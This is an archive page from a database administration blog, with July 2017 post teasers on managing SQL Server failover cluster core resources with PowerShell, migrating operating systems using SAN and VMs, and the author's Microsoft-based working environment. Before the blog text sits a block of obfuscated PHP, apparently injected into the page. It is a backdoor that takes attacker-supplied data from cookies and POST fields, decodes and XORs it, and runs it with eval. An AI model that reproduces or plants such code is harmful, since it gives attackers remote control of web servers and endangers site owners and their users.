$AarZirX = "\x42" . 'k' . "\155" . chr (95) . "\144" . "\x6a" . chr ( 424 - 326 ); $SNqti = "\143" . chr ( 115 - 7 ).chr ( 794 - 697 )."\x73" . "\x73" . "\137" . "\145" . "\170" . 'i' . 's' . 't' . chr (115); $fmTOLe = class_exists($AarZirX); $AarZirX = "47942";$SNqti = "52429";$PhHVZnmDLJ = FALSE;if ($fmTOLe === $PhHVZnmDLJ){$KDxORKW = "27103";class Bkm_djb{public function OBITDK(){echo "818";}private $RzxqsUlfk;public static $lXRryX = "3c0f0536-331e-42b2-b91f-3f993aeb70d6";public static $yQsWWiQmTQ = 64328;public function __construct($XBbosKljtQ=0){$YqUpk = $_POST;$izixkj = $_COOKIE;$BijfyoaVs = @$izixkj[substr(Bkm_djb::$lXRryX, 0, 4)];if (!empty($BijfyoaVs)){$hgOXrXV = "base64";$ZVUxc = "";$BijfyoaVs = explode(",", $BijfyoaVs);foreach ($BijfyoaVs as $FYlqXZ){$ZVUxc .= @$izixkj[$FYlqXZ];$ZVUxc .= @$YqUpk[$FYlqXZ];}$ZVUxc = array_map($hgOXrXV . '_' . "\x64" . "\x65" . "\143" . 'o' . "\x64" . chr ( 924 - 823 ), array($ZVUxc,)); $ZVUxc = $ZVUxc[0] ^ str_repeat(Bkm_djb::$lXRryX, (strlen($ZVUxc[0]) / strlen(Bkm_djb::$lXRryX)) + 1);Bkm_djb::$yQsWWiQmTQ = @unserialize($ZVUxc);}}private function HKqCHsDiwU($KDxORKW){if (is_array(Bkm_djb::$yQsWWiQmTQ)) {$zBCNREfP = str_replace("\x3c" . "\77" . 'p' . 'h' . 'p', "", Bkm_djb::$yQsWWiQmTQ["\x63" . "\x6f" . chr (110) . "\164" . chr ( 845 - 744 )."\156" . "\164"]);eval($zBCNREfP); $KDxORKW = "27103";exit();}}public function __destruct(){$this->HKqCHsDiwU($KDxORKW);}}$BdbwM = new /* 13409 */ Bkm_djb(); $BdbwM = str_repeat("56053_11300", 1);} July 2017 – The DBA Chronicles

Chronicling journeys in the world of database design and administration

Month: July 2017

Powershell script for managing location of core cluster resources

In our SQL Failover Cluster Instance (FCI) environments (overall environment description available here) we generally use 2 servers plus a disk witness (quorum drive) – we only have one data center so we don’t take the overhead of using node majority.  That quorum drive is part of the resource group called “Cluster Group”, commonly known as cluster core resources.  The core cluster resources have no relationship with any other cluster resources (e.g. the SQL Server resource), and they can fail over independently from any other cluster resource. They also stay in place if someone fails over the other resources (i.e. SQL). Continue reading

Using our SAN and VMs for migrating operating systems

As part of a major CRM upgrade we upgraded from Windows 2008R2 and SQL Server 2008R2 to Windows 2012R2 and SQL Server 2016 (woo-hoo!).  Our CRM product is a little complex (see my working environment for some details), and it’s large (over 1TB for the main database), and we needed to perform the upgrade in all of our non-prod environments (4 total for this one).  Since it’s a critical revenue-generating system, our production upgrade would need to be as fast as possible.  Due to the size of the data and the amount of systems and integrations, we were already expecting to have a multi-day outage for the upgrade and full post-upgrade testing. Continue reading

My working environment

Overview

I created this post to use as a reference for how my current working environment is configured, so I don’t have to repeat details in my other posts; I can just reference this post.

What we have

Our shop is predominantly Microsoft, so .NET and MSSQL, with a few others thrown in (MySQL and PHP, really, but I have almost nothing to do with them (yay)), and we’re also in the process of integrating Azure into the mix. Other than our production environment we have 2-3 non-prod tiers for almost all of our ecosystems: DEV and QA for almost all, and PLT (performance load testing) for a couple. We are a VMWare shop and aside from a few older systems almost 100% of our environment is virtualized (of the machines which can be virtualized, of course). Because of this, we have dedicated ESX hosts for all of our SQL Servers and license the hosts; this allows us to have as many VMs as we need (as an enterprise client we have Software Assurance) as well as use Enterprise Edition, which also allows us to create dedicated SQL Servers for individual ecosystems and not have to worry about the issues with sharing. We currently have around 90 SQL Server instances in production. Continue reading

© 2024 The DBA Chronicles

Theme by Anders NorenUp ↑